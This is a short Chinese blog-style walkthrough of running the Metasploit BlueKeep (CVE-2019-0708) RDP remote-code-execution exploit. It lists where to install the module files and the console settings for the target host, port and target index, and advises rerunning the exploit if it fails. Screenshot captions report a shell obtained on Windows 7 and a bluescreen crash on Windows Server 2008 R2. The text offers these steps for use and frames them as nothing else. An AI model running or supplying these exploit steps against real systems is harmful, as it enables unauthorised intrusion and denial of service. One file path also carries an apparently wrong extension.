各文件对应位置
rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.db
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
windows7
配置参数
set rhost 目标IP(windows7 64x)
set rport 目标端口
set target 3
run 不成功就多run几次
![](https://img2018.cnblogs.com/blog/1431916/201909/1431916-20190909105422204-1570620036.png)
建立session
获得交互式shell
shell
python
![](https://img2018.cnblogs.com/blog/1431916/201909/1431916-20190909105627858-601729058.png)
windows2008 R2 64x
蓝屏
![](https://img2018.cnblogs.com/blog/1431916/201909/1431916-20190909131510689-514406880.png)